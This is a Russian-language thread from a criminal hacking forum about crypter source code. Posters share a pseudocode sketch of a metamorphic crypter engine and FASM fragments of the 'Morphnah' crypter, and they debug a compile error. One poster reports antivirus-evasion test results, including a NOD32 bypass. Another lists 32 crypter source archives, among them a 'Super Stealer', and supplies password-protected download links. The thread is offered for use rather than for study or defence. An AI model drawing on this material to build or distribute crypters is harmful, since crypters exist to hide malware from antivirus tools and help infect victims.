• XSS.stack #1 – первый литературный журнал от юзеров форума

Исходники Крипторов

Отслеживать
пермутативный движок криптора (наверняка раньше видели), реализованы некоторые фичи зомбика
Код: 
void pseudo-example()
{
	if (smi2le::Disasm() == ERR_SUCCESS)
	{
  for (as_long_as_you_feel_like_it)
  {
  	if (smi2le::AddTrash())
    break;
  	if (smi2le::Permutate())
    break;
  	if (smi2le::Mutate())
    break;

  	//any other shit you add to the engine.

  }

  if (smi2le::Asm() == ERR_SUCCES)
  {
  	do_stuff();
  }
	}
}
 
Подскажите, что за трабла была в крипторе morphnah?
Скомпилел сабж от саламандры- все ок, компилю оригинальный от кас- байда с инклудами и потом с
Код: 
flat assembler  version 1.67.15  (1060361 kilobytes memory)
SOURCE\morphnah_kriv.Asm [852]:
        mov eax,[edi+IMAGE_SECTION_HEADER.OffsetToRawData]
error: undefined symbol.
Для продолжения нажмите любую клавишу . . .

Да и отличия такие вот
версия саламандры
Код: 
format PE GUI 4.0
entry MyEntry

include 'FASM\include\windows.inc'
include 'FASM\include\macro\masm.inc'
include 'FASM\include\macro\if.inc'

BBrowse    equ 1002
BCrypt    equ 1006
TFilePath  equ 1001

Sign  	equ	00ABh

StandartStubSize equ 100h    



section '.data' data readable writeable

gIst dd 0
gWnd dd 0

версия каса (с правленным инклудом win32ax на windows.ax)
Код: 
;	Morphnah Crypter 1.0.0
;	Kas,icq: 5488o4

;	

format PE GUI 4.0
entry MyEntry

include 'FASM\INCLUDE\Windows.inc'
include 'FASM\INCLUDE\macro\masm.inc'
include 'FASM\INCLUDE\macro\if.inc'

BBrowse    equ 1002
BCrypt     equ 1006
TFilePath  equ 1001

Sign  	equ	00ABh

StandartStubSize equ 100h                 


IMAGE_DIRECTORY_ENTRY_EXPORT                equ  0
IMAGE_DIRECTORY_ENTRY_IMPORT                equ  1
IMAGE_DIRECTORY_ENTRY_RESOURCE              equ  2
IMAGE_DIRECTORY_ENTRY_EXCEPTION             equ  3
IMAGE_DIRECTORY_ENTRY_SECURITY              equ  4
IMAGE_DIRECTORY_ENTRY_BASERELOC             equ  5
IMAGE_DIRECTORY_ENTRY_DEBUG                 equ  6
IMAGE_DIRECTORY_ENTRY_COPYRIGHT             equ  7
IMAGE_DIRECTORY_ENTRY_GLOBALPTR             equ  8
IMAGE_DIRECTORY_ENTRY_TLS                   equ  9
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG           equ 10
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT          equ 11
IMAGE_DIRECTORY_ENTRY_IAT                   equ 12

section '.data' data readable writeable

gIst dd 0
gWnd dd 0

что дают эти сабжи?
 
error: undefined symbol.
где-то в хидерах IMAGE_SECTION_HEADER.OffsetToRawData не объявлен, либо отдельный элемент какой-то забыли.
очевидно же
 
TrueMind, ну понятно что не обьявлен, но честно говоря, до конца еще не разобрал всего кода тогда.
По криптору- актуально ли его еще чистить? я вот тестил его на днях- вот результаты на серваке спайнета 2.7
С галкой антиэмуля и обхода Nod32:
:screenshot: Скриншот|Screenshot
и без галки Нода32
:screenshot: Скриншот|Screenshot
 
На первый взгляд что-то не заинклудилось... По всей видимости ругается на отсутствие определения структуры IMAGE_SECTION_HEADER или поля OffsetToRawData. Надо смотреть где оно и как определно в тех виндовых файлах что ты инклудишь...
 
Такой монолитный асм код не подготовленному уму трудно видоизменить\саппортить.
Когда присутствует необходимый набор знаний для осознания онного, отпадает необходимость юзать чужой код, потому как проще написать свой гибкий код с нуля.
 
Исходники крипторов на VB6 и C++. Среди файлов есть и известные приватные крипторы, Всего в архиве 32 исходника криптора.

BIODOX+Source-code.rar
c++ no PE.txt
CodingNation Crypter Source.rar
Crypter+very.rar
Fly Crypter v2d + Uniq Stub Generator 0.3.rar
Flyby+Crypter+2.rar
Polifemo+Ebrio+Crypter.rar
FuKrypt_4.rar
GioCrypter.rar
Goku+Simple+Crypter+0[1].5+(Source).rar
HackHound+Crypter+V[1].4.rar
Incrypter+Private+Source.rar
Indetectables+Crypter.rar
Infinity.rar
LC+Down.rar
MiniCrypt-source.rar
NT2+CRYPTER+FULL+SOURCE+Edit+AJaN.rar
OhShin.rar
P-obfuscator+1[1].1.rar
prjCone.rar
ProCrypter — Stubgen.rar
Runtime Crypter Mudkip.rar
RunTime Crypter skyweb007.rar
Shadow Crypter.rar
SkuLLByte+Crypt++[SRC][VB].rar
Source+cs+1.rar
SU+v1.rar
Super+Stealer+(SOURCE).rar
TCrypter.rar
White-Crypt.rar
=8-D src.rar

p.s все тыц

вот ещё;
1.тыц
2.тыц
3.тыц
 
xrahitel сказал(а):
Исходники крипторов на VB6 и C++. Среди файлов есть и известные приватные крипторы, Всего в архиве 32 исходника криптора.

BIODOX+Source-code.rar
c++ no PE.txt
CodingNation Crypter Source.rar
Crypter+very.rar
Fly Crypter v2d + Uniq Stub Generator 0.3.rar
Flyby+Crypter+2.rar
Polifemo+Ebrio+Crypter.rar
FuKrypt_4.rar
GioCrypter.rar
Goku+Simple+Crypter+0[1].5+(Source).rar
HackHound+Crypter+V[1].4.rar
Incrypter+Private+Source.rar
Indetectables+Crypter.rar
Infinity.rar
LC+Down.rar
MiniCrypt-source.rar
NT2+CRYPTER+FULL+SOURCE+Edit+AJaN.rar
OhShin.rar
P-obfuscator+1[1].1.rar
prjCone.rar
ProCrypter — Stubgen.rar
Runtime Crypter Mudkip.rar
RunTime Crypter skyweb007.rar
Shadow Crypter.rar
SkuLLByte+Crypt++[SRC][VB].rar
Source+cs+1.rar
SU+v1.rar
Super+Stealer+(SOURCE).rar
TCrypter.rar
White-Crypt.rar
=8-D src.rar

p.s все тыц

вот ещё;
1.тыц
2.тыц
3.тыц
у кого-нибудь остались сорцы ? первая ссылка мертвая
 
smallpill сказал(а):
у кого-нибудь остались сорцы ? первая ссылка мертвая
pass мой ник.
Код: 
https://cloud.mail.ru/public/UEhc/WN3KQcwTe

https://cloud.mail.ru/public/7SUH/yJpc99xST

https://cloud.mail.ru/public/6MLa/QcCheumDM

https://cloud.mail.ru/public/7oAx/F8G24HJud

https://cloud.mail.ru/public/8b4y/S8xx1tez6
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх